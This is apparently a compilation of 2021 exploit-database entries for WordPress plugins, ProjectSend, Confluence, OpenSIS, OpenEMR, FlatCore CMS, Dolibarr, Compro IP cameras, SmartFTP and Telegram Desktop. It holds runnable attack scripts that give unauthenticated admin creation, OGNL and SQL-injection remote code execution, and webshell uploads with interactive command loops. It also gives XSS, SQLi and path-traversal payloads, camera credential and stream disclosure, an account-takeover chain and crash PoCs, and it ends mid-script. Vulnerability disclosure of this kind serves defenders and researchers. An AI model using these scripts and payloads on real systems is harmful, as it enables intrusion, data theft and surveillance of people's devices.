
# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.1.3
	   [2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621

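#!/bin/bash

# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3 (CVE-2021-34621)
#
# The request smuggles wp_capabilities[administrator]=1 among the ordinary
# registration fields of the plugin's pp_ajax_signup action, which is reachable
# unauthenticated through admin-ajax.php; on vulnerable versions the plugin
# honours it and the new account is created as an administrator.
#
# Change the name, e-mail and password below as per your requirement.
# Usage: ./exploit.sh http://target   (scheme + host, trailing slash optional)
# Inspect the server's response to admin-ajax.php to see whether the signup
# was accepted.

set -u

if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <base URL, e.g. http://target>" >&2
    exit 1
fi

# Drop a trailing slash so the endpoint path is not doubled.
URL="${1%/}"
USERNAME="numan"
EMAIL="pwned@numan.com"
PASSWORD="numan"

# All variables are quoted: an unquoted $URL would be word-split and
# glob-expanded by the shell before curl ever saw it.
curl -X POST "${URL}/wp-admin/admin-ajax.php" \
 -H "Content-Type: application/x-www-form-urlencoded" \
 -d "reg_username=${USERNAME}" \
 -d "reg_email=${EMAIL}" \
 -d "reg_password=${PASSWORD}" \
 -d "reg_password_present=true" \
 -d "wp_capabilities[administrator]=1" \
 -d "reg_first_name=pwned" \
 -d "reg_last_name=numan" \
 -d "action=pp_ajax_signup"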
            
# Exploit Title: Projectsend r1295 - 'name' Stored XSS 
# Date: 30.08.2021
# Exploit Author: Abdullah Kala
# Vendor Homepage: https://www.projectsend.org/
# Software Link: https://www.projectsend.org/download/387/
# Version: r1295
# Tested on: Ubuntu 18.04 
# Description: First create a client group. Then, logged in as a user of any role, upload a file; on the edit page you are redirected to, place the payload in the file's "name" (title) field, assign the group you created and save. When a user with the "System Administrator" role opens the "Dashboard" page, the stored XSS fires.

POST /projectsend/files-edit.php?ids=1 HTTP/1.1
Host: 10.10.10.55
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36890316955266305672634658708
Content-Length: 1323
Origin: http://10.10.10.55
Connection: close
Referer: http://10.10.10.55/projectsend/files-edit.php?ids=5
Cookie: menu_contracted=false; PHPSESSID=kvip7m24ib2d062hcaut3fbr2o
Upgrade-Insecure-Requests: 1

-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="csrf_token"

f53a148f0f952cb00c7e7edc63be5a3efd911d5c27de15eb78c7323a6d7b3c02
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][id]"

1
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][original]"

test.png
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][file]"

1630247451-f2d3f09150beb76c7f2c83dc27732a0b23718875-kudur.png
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][name]"

<script>alert(1)</script>
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][description]"

test
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][expiry_date]"

28-09-2021
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][assignments][groups][]"

1
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="save"


-----------------------------36890316955266305672634658708--
            
# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)
# Date: 01/09/2021
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: Confluence Server 7.12.x before 7.12.5 (earlier release lines are also affected; see the Atlassian advisory referenced below for the full list of fixed versions)
# Tested on: Linux Distros 
# CVE : CVE-2021-26084

#!/usr/bin/python3

# References: 
# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

import requests
from bs4 import BeautifulSoup
import optparse

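parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url",
                  help="Base target host: http://confluencexxx.com")
parser.add_option('-p', '--path', action="store", dest="path",
                  help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x")

options, args = parser.parse_args()

# Both options are mandatory.  Validate them before anything else is set up
# and exit non-zero so a wrapper script can tell a usage error from success
# (the original called exit() with no status, i.e. status 0).
if not options.url or not options.path:
    print('[+] Specify an url target')
    print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
    print('[+] Example help usage: exploit.py -h')
    raise SystemExit(1)

session = requests.Session()

# Module-level state read by cmdExec().  A trailing slash on the base URL is
# removed so that joining it with the leading-slash path does not yield "//".
url_vuln = options.url.rstrip('/')
endpoint = options.path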


def banner():
    """Print the tool header (name, CVE and author link) to stdout."""
    header_lines = (
        '---------------------------------------------------------------',
        '[-] Confluence Server Webwork OGNL injection',
        '[-] CVE-2021-26084',
        '[-] https://github.com/h3v0x',
        '--------------------------------------------------------------- \n',
    )
    for text in header_lines:
        print(text)


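def cmdExec():
    """Interactive command loop over the OGNL injection.

    Reads a command from stdin, embeds it in the ``queryString`` payload,
    POSTs it to ``url_vuln + endpoint`` and prints the value the server
    reflects back in the hidden ``queryString`` input (which carries the
    command output).  Type ``exit``/``quit`` or press Ctrl-D / Ctrl-C to
    leave the loop.

    The command is spliced verbatim into a JavaScript string literal whose
    delimiters are the ``\\u0022`` escapes in the payload; a command that
    itself contains a double quote, single quote or backslash would break
    out of that literal and corrupt the payload, so such commands are
    refused rather than sent.
    """
    xpl_url = url_vuln + endpoint
    xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate"}

    while True:
        try:
            cmd = input('> ')
        except (EOFError, KeyboardInterrupt):
            print()
            return
        if not cmd.strip():
            continue
        if cmd.strip().lower() in ('exit', 'quit'):
            return
        if any(ch in cmd for ch in '"\'\\'):
            print('[-] Commands containing quotes or backslashes would break the payload; not sent')
            continue

        xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}

        # A timeout keeps a hung or filtering target from blocking the loop forever.
        try:
            rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data, timeout=30)
        except requests.RequestException as exc:
            print('[-] Request failed: %s' % exc)
            continue

        soup = BeautifulSoup(rawHTML.text, 'html.parser')
        field = soup.find('input', attrs={'name': 'queryString', 'type': 'hidden'})
        # A patched target, a wrong path or an error page has no such field;
        # the original indexed ['value'] on None and died with a TypeError.
        if field is None or not field.has_attr('value'):
            print('[-] No hidden queryString field in the response (HTTP %d); '
                  'target may be patched or the path may be wrong' % rawHTML.status_code)
            continue
        print(field['value'])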


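# Only start the interactive RCE loop when run as a script, not on import.
if __name__ == "__main__":
    banner()
    cmdExec()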
            
# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
# Date: 19.08.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux

import requests
import random
import string
import json
from bs4 import BeautifulSoup

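url = input("TARGET = ")

# Normalise the target so every relative path below can be appended directly.
if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

# One-line PHP webshell: runs the 'tago' GET parameter through system().
payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"

# Random file name so the dropped shell is not trivially guessable by others.
# (random is not a CSPRNG; secrets.choice would be stronger if unguessability matters.)
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))


session = requests.session()

print("Login Bypass\n")

# Authentication bypass: the username is interpolated into the login query
# unsanitised, so `admin' or '1'='1'#` short-circuits the credential check.
# (The original prefixed the path with "/" which, after the trailing slash
# added above, produced "host//classes/...".)
request_url = url + "classes/Login.php?f=login"
post_data = {"username": "admin' or '1'='1'#", "password": ""}
bypassUser = session.post(request_url, data=post_data)
try:
    status = json.loads(bypassUser.text).get("status")
except ValueError:
    # Not JSON at all: wrong path, WAF page, or a different application.
    status = None

if status == "success":

    print("Finding first driver\n")

    getHTML = session.get(url + "admin/?page=drivers")
    getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
    firstDelete = getHTMLParser.find("a", {"class": "delete_data"})
    if firstDelete is None or not firstDelete.get("data-id"):
        raise SystemExit("No driver record found on admin/?page=drivers; "
                         "the injection point needs at least one existing driver")
    findFirstDriverID = firstDelete.get("data-id")

    print("Found first driver ID : " + findFirstDriverID)

    print("\nFinding path")

    # A stray quote in the id breaks the SQL statement; with display_errors
    # on, PHP's warning leaks the absolute path of the script on disk.
    findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'')
    body = findPath.text
    try:
        findPath = body[body.index("<b>Warning</b>:  ")+17:body.index("</b> on line ")]
        findPath = findPath[findPath.index("<b>")+3:]
    except ValueError:
        raise SystemExit("No PHP warning in the response; the path leak requires "
                         "display_errors=On on the target")

    # Strip the file name and keep the directory with a trailing "/".
    # Handles both Windows (backslash) and POSIX (slash) paths: the original
    # split only on backslashes, so on a Linux target it produced an empty
    # string and crashed at the "admin/" lookup below.
    findPath = findPath.replace('\\', '/')
    findPath = findPath.rsplit('/', 1)[0] + '/'

    print("\nFound Path : " + findPath)
    if "admin/" not in findPath:
        raise SystemExit("Leaked path does not contain 'admin/'; cannot derive the web path of the shell")
    shellPath = findPath[findPath.index("admin/"):]

    # Write the shell via INTO OUTFILE.  This needs the MySQL account to hold
    # the FILE privilege, secure_file_priv must not exclude the web root, and
    # the MySQL server must be able to write into the web directory.
    SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
    SQLtoRCE = SQLtoRCE.replace("#PATH#", findPath+shellname+".php")
    # NOTE(review): the literal "0x3" prefix makes the hex literal odd-length;
    # MySQL pads it on the left, so the written file starts with a 0x03 byte
    # before "<?php".  Kept as in the original PoC - confirm it is intended.
    SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())

    print("\n\nShell Uploading...")
    session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE)

    shell_url = url+shellPath+shellname+".php"
    print("\nShell Path : " + shell_url)
    shellOutput = session.get(shell_url+"?tago=whoami")
    if shellOutput.status_code != 200:
        print("\nShell not reachable (HTTP %d) - INTO OUTFILE most likely failed "
              "(FILE privilege, secure_file_priv or an unwritable web root)" % shellOutput.status_code)
    else:
        print("\n\nShell Output : "+shellOutput.text)

else:
    print("No bypass user")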
            

OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection

# Exploit Title: OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection # Date: 09/01/2021 # Exploit Author: Eric Salario # Vendor Homepage: http://www.os4ed.com/ # Software Link: https://opensis.com/download # Version: 8.0 # Tested on: Windows, Linux A SQL injection vulnerability exists in the Take Attendance functionality of OS4Ed's OpenSIS 8.0 that allows an attacker to inject their own SQL. The cp_id_miss_attn parameter of TakeAttendance.php is vulnerable. It is triggered with an authenticated HTTP request by any user who has access to the "Take Attendance" functionality (e.g. a Teacher). Steps to reproduce: 1. Log in as "Teacher", navigate to "Attendance" then "Take Attendance" and capture the request in a web proxy such as Burp Suite, or navigate directly to: http://localhost/Ajax.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=27&cpv_id_miss_attn=23&ajax=true Vulnerable parameter: cp_id_miss_attn SQLi payload (time-based blind): r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq) URL with the payload: http://localhost/Ajax.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq)&cpv_id_miss_attn=23&ajax=true 2. The response is delayed by the SLEEP duration (10 seconds here), which confirms the injection. The database can then be dumped with manual queries or with sqlmap. PoC: https://youtu.be/GGHiPvdPRas

WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection

# Exploit Title: WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection # Date: 29/08/2021 # Exploit Author: Niraj Mahajan # Software Link: https://wordpress.org/plugins/invoicing/ # Version: 2.4.6 # Tested on: Windows *Steps to Reproduce:* 1. Install WordPress 5.8 2. Install and activate "WordPress Payments Plugin | GetPaid" version 2.4.6 3. Navigate to GetPaid > Payment Forms 4. Click "Add New" on the Payment Form page 5. Add a title and click on "Billing Email" 6. The "Help Text" field is shown on the left-hand side. 7. Enter the HTML below into the "Help Text" field: <img src=" https://www.pandasecurity.com/en/mediacenter/src/uploads/2019/07/pandasecurity-How-do-hackers-pick-their-targets.jpg" height="200px" width="200px"> 8. The HTML is stored unsanitised in the database and rendered: the image appears in the form preview on the right-hand side.
# Exploit Title: Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated) # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40379 On the affected devices the RTSP service accepts connections without authentication, so anyone who can reach the device on the network can view the live surveillance video stream. Payload: rtsp://<camera-ip>/medias2 (open it with any RTSP client, e.g. VLC or ffplay). Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
# Exploit Title: Compro Technology IP Camera - 'mjpegStreamer.cgi' Screenshot Disclosure # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40382 The /mjpegStreamer.cgi endpoint can be requested without authentication and returns current camera video screenshots, disclosing them to anyone who can reach the device. Payload: http://<camera-ip>/mjpegStreamer.cgi Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

Compro Technology IP Camera - 'Multiple' Credential Disclosure

# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40380 The following CGI endpoints can be requested without authentication and disclose the device administrator's username and password, or the RTSP username and password. Payload: /cgi-bin/cameralist/cameralist.cgi /cgi-bin/cameralist/setcamera.cgi?id=* (where * is a camera id) Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

OpenSIS 8.0 'modname' - Directory Traversal

# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal # Date: 09-02-2021 # Exploit Author: Eric Salario # Vendor Homepage: http://www.os4ed.com/ # Software Link: https://opensis.com/download # Version: 8.0 # Tested on: Windows, Linux # CVE: CVE-2021-40651 The 'modname' parameter of 'Modules.php' is vulnerable to local file inclusion. This can be exploited to expose sensitive information from arbitrary files on the underlying system. Exploitation requires a valid "Parent" account. Navigating to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php returns the contents of Portal.php. By walking back up the directory tree with '..%2f' (URL-decoded to '../') it is possible to disclose arbitrary files from the server's filesystem, as long as the web server process can read them. 1. Log in as "Parent" 2. Open a web proxy such as Burp Suite and capture the requests 3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= 4. Check the response PoC: https://youtu.be/wFwlbXANRCo
# Exploit Title: WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS) # Date: 02/09/2021 # Exploit Author: Nikhil Kapoor # Software Link: https://wordpress.org/plugins/duplicate-page/ # Version: 4.4.1 # Category: Web Application # Tested on: Windows How to reproduce: 1. Install WordPress 5.7.2 2. Install and activate Duplicate Page 3. Log in with an account that can reach Settings >> Duplicate Page (normally an administrator), open that page and enter the XSS payload into the "Duplicate Post Suffix" input field. 4. Click Save Changes. 5. The payload is stored unsanitised in the database and is executed whenever that functionality is triggered again, producing a JavaScript pop-up. 6. Payload used: "><svg/onload=confirm(/XSS/)>

OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)

# Exploit Title: OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR) # Date: 31/08/2021 # Exploit Author: Allen Enosh Upputori # Vendor Homepage: https://www.open-emr.org # Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads # Version: 6.0.0 # Tested on: Linux # CVE : CVE-2021-40352 How to reproduce: 1. Install OpenEMR 6.0.0 2. Log in as a Physician 3. Open Messages 4. Click Print 5. Change the existing "noteid=" value in the request to another number. The print view then shows other users' messages, including admin-only messages, so the noteid does not appear to be checked against the requesting user's authorisation.
# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure Direct Object Reference (IDOR) # Date: 2021-09-05 # Exploit Author: sudoninja # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 10 - XAMPP Server # Vulnerable page: http://localhost/buspassms/admin/view-pass-detail.php?viewid=4 # Vulnerable parameter: viewid is vulnerable to Insecure Direct Object Reference (IDOR) # Proof of Concept: # 1. Download and install [ bus-pass-management-system ] # 2. Go to /admin/index.php and enter the username and password # 3. Navigate to Search >> Search Pass # 4. Click "View" and change the viewid value in the URL: http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id] # Note: the affected page is under /admin/ and the steps require an admin login, so this is an authenticated issue; its impact depends on whether admin users are meant to see only a subset of passes.

FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)

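#!/usr/bin/env python3
# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/10/2021
# Exploit Author: Mason Soroka-Gill @sgizoid
# Vendor Homepage: https://flatcore.org/
# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz
# Version: 2.0.7
# Tested on: Ubuntu Server 21.04
# CVE: CVE-2021-39608
# References:
# - https://github.com/flatCore/flatCore-CMS/issues/52
#
# Flow: log in with the supplied (valid) credentials, grab the PHP session
# cookie and the CSRF token from the addons page, upload a one-line PHP
# webshell through the plugin upload endpoint, run commands through it
# interactively, then delete the shell and log out.

import sys

import requests
from lxml import html
from urllib.parse import urlencode

if len(sys.argv) != 4:
    print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'")
    sys.exit(1)

TARGET = sys.argv[1].rstrip("/")  # avoid "//" when a trailing slash is passed
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]
SHELL_NAME = "sgizoid.php"

# attempt to log in
resp = requests.post(f"{TARGET}/index.php?p=1", data={
    "login_name": f"{USERNAME}",
    "login_psw": f"{PASSWORD}",
    "login": "Anmelden"})

# grab the PHP session ID; the original indexed the header directly and
# died with a KeyError when the response carried no Set-Cookie at all
set_cookie = resp.headers.get("Set-Cookie")
if not set_cookie:
    print("Login response carried no Set-Cookie header; cannot obtain a session")
    sys.exit(1)
PHPSESSID = set_cookie.split(";")[0]
SESSION_HEADERS = {"Cookie": PHPSESSID}

# validate credentials worked
resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons", headers=SESSION_HEADERS)
if resp.status_code != 200:
    print("Invalid credentials")
    sys.exit(1)
print("Logged in")

# grab the csrf token for the script upload: prefer the field by name and
# fall back to the positional lookup the original PoC relied on
tree = html.document_fromstring(resp.text)
token_values = tree.xpath('//input[@name="csrf_token"]/@value')
if token_values:
    csrf_token = token_values[0]
else:
    inputs = tree.xpath('//form/input[7]')
    if not inputs:
        print("Could not locate the csrf token on the addons page")
        sys.exit(1)
    csrf_token = inputs[0].value

# post the shell to the host
resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php",
                     data={"upload_type": "plugin", "csrf_token": csrf_token},  # the csrf token
                     files={"file": (SHELL_NAME, "<?php echo shell_exec($_GET['sg']); ?>")},  # the webshell
                     headers=SESSION_HEADERS)  # the php session id
if resp.status_code != 200:
    print(f"Upload request returned HTTP {resp.status_code}; the shell may not have been written")

try:
    # pretend to be a shell
    while True:
        command = input("$ ")
        if command.lower() in ("exit", "q"):
            break
        resp = requests.get(f"{TARGET}/upload/plugins/{SHELL_NAME}?{urlencode({'sg': command})}")
        # verify payload succeeded
        if resp.status_code == 200:
            print(resp.text)
        else:
            print("Error: Something went wrong, maybe the shell didn't work?")
            break
except (KeyboardInterrupt, EOFError):
    print()
finally:
    # delete the webshell even if the loop was interrupted, so it is not left on the target
    resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del={SHELL_NAME}",
                        headers=SESSION_HEADERS)
    if resp.status_code == 200:
        print("Cleaned up webshell")
    # clean up the session
    resp = requests.get(f"{TARGET}/index.php?goto=logout", headers=SESSION_HEADERS)
    if resp.status_code == 200:
        print("Logged out")
sys.exit(0)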

SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)

# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service # Date: 9/5/2021 # Exploit Author: Eric Salario # Vendor Homepage: https://www.smartftp.com/en-us/ # Software Link: https://www.smartftp.com/en-us/download # Version: 10.0.2909.0 (32 and 64 bit) # Tested on: Microsoft Windows 10 32 bit and 64 bit All three are local crashes triggered through the client's own UI; no remote trigger is demonstrated. ========================================================================= buffer = "//" buffer += "A" * 423 f = open ("path.txt", "w") f.write(buffer) f.close() 1. Run the python script above (it writes a 425-byte path, "//" followed by 423 "A"s, to path.txt) 2. Open SmartFTP > New Connection > FTPS (explicit) 3. Enter an IP address the client cannot reach (e.g. 255.255.255.255) 4. In Path, paste the content of the generated "path.txt" 5. Click "OK" 6. SmartFTP client crashes ======================================================================= 1. Open SmartFTP > New Connection > FTPS (explicit) 2. Enter an IP address the client cannot reach (e.g. 255.255.255.255) 3. In Path, type a slash ("/") and click "OK" 4. The app should return "Error 0x80072741" 5. In the path's search bar, replace the slash ("/") with any other text and press Enter 6. SmartFTP client crashes ======================================================================= 1. Open SmartFTP 2. In the "New Connection" bar, clear the history (dropdown to the right of the bar) 3. Once the history is empty, click the bar and type anything 4. SmartFTP client crashes

Dolibarr ERP 14.0.1 - Privilege Escalation

# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation # Date: April 8, 2021 # Exploit Author: Vishwaraj101 # Vendor Homepage: https://www.dolibarr.org/ # Affected Version: <= 14.0.1 # Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d *Summary:* Using the chain of issues below, an attacker holding any valid account (even one with no permissions) can compromise any Dolibarr user account, including the admin. *PoC:* 1. Visit https://example.com/api/index.php/login?login=demo&password=demo to log in as a test user with no (or minimal) permissions. 2. The response contains an API token; it is sent in the later requests as the DOLAPIKEY header. 3. Next, fetch the user id of the account to take over. *First fetch the admin's user id with the API below.* *Request 1:* GET /api/index.php/users/login/admin HTTP/1.1 Host: preview2.dolibarr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DOLAPIKEY: test1337 Connection: close *This returns the user's details, looked up by username.
Now update the victim user account via below api (include the json body received from the previous request1 and replace the email id from below json to the attacker controlled email)* *Request2:*PUT /api/index.php/users/*12* HTTP/1.1 Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Origin: https://preview2.dolibarr.orgConnection: closeReferer: http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length: 3221 { "id": "12", "statut": "1", "employee": "1", "civility_code": null, "gender": "woman", "birth": 495583200, "email": "*attacker@example.com <attacker@example.com>*", "personal_email": "", "socialnetworks": { "facebook": "", "skype": "", "twitter": "", "linkedin": "", "instagram": "", "snapchat": "", "googleplus": "", "youtube": "", "whatsapp": "", "tumblr": "", "vero": "", "viadeo": "", "slack": "", "xing": "", "meetup": "", "pinterest": "", "flickr": "", "500px": "", "giphy": "", "gifycat": "", "dailymotion": "", "vimeo": "", "periscope": "", "twitch": "", "discord": "", "wikipedia": "", "reddit": "", "quora": "", "tripadvisor": "", "mastodon": "", "diaspora": "", "viber": "" }, "job": "Admin Technical", "signature": "", "address": "", "zip": "", "town": "", "state_id": null, "state_code": null, "state": null, "office_phone": "", "office_fax": "", "user_mobile": "", "personal_mobile": "", "admin": "1", "login": "admin", "entity": "0", "datec": 1507187386, "datem": 1617819214, "socid": null, "contact_id": null, "fk_member": null, "fk_user": "11", "fk_user_expense_validator": null, "fk_user_holiday_validator": null, "clicktodial_url": null, "clicktodial_login": null, "clicktodial_poste": null, "datelastlogin": 1617816891, "datepreviouslogin": 1617815935, "datestartvalidity": "", 
"dateendvalidity": "", "photo": "com.jpg", "lang": "fr_FR", "rights": { "user": { "user": {}, "self": {} } }, "conf": {}, "users": [], "parentof": null, "accountancy_code": "", "weeklyhours": "39.00000000", "color": "", "dateemployment": "", "dateemploymentend": "", "default_c_exp_tax_cat": null, "default_range": null, "fk_warehouse": null, "import_key": null, "array_options": [], "array_languages": null, "linkedObjectsIds": null, "canvas": null, "fk_project": null, "contact": null, "thirdparty": null, "user": null, "origin": null, "origin_id": null, "ref": "12", "ref_ext": null, "status": null, "country": null, "country_id": null, "country_code": "", "region_id": null, "barcode_type": null, "barcode_type_code": null, "barcode_type_label": null, "barcode_type_coder": null, "mode_reglement_id": null, "cond_reglement_id": null, "demand_reason_id": null, "transport_mode_id": null, "cond_reglement": null, "modelpdf": null, "last_main_doc": null, "fk_bank": null, "fk_account": null, "note_public": "", "note_private": "", "note": "", "name": null, "lastname": "Adminson", "firstname": "Alice", "civility_id": null, "date_creation": null, "date_validation": null, "date_modification": null, "specimen": 0, "alreadypaid": null, "liste_limit": 0 } This will reset the admin email account to the attacker controlled email account, now using the password reset feature attacker will reset the admin account password and will gain access to the admin account.

Telegram Desktop 2.9.2 - Denial of Service (PoC)

# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC) # Exploit Author: Aryan Chehreghani # Date: 2021-08-30 # Vendor Homepage: https://telegram.org # Software Link: https://telegram.org/dl/desktop/win64 # Tested Version: 2.9.2 x64 # Tested on OS: Windows 10 Enterprise # [ About App ] # Telegram is a messaging app with a focus on speed and security; it is fast, simple and free. # You can use Telegram on all your devices at the same time - your messages sync seamlessly across any number of your phones, tablets or computers. # Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world. # With Telegram you can send messages, photos, videos and files of any type (doc, zip, mp3, etc.), as well as create groups for up to 200,000 people or channels for broadcasting to unlimited audiences. # You can write to your phone contacts and find people by their usernames. As a result, # Telegram is like SMS and email combined - and can take care of all your personal or business messaging needs. # Telegram supports end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants. # [ POC ] # 1. Run the python script; it creates a new file "output.txt" containing 9,000,000 "A" characters # 2. Run Telegram Desktop and go to "Saved Messages" # 3. Copy the content of the file "output.txt" # 4. Paste the content of "output.txt" into the "Write a message..." box # 5. The client crashes # Note: this is a local crash of the desktop client triggered by pasting; no remote delivery of the payload is demonstrated. #!/usr/bin/env python buffer = "\x41" * 9000000 try: f=open("output.txt","w") print("[!] 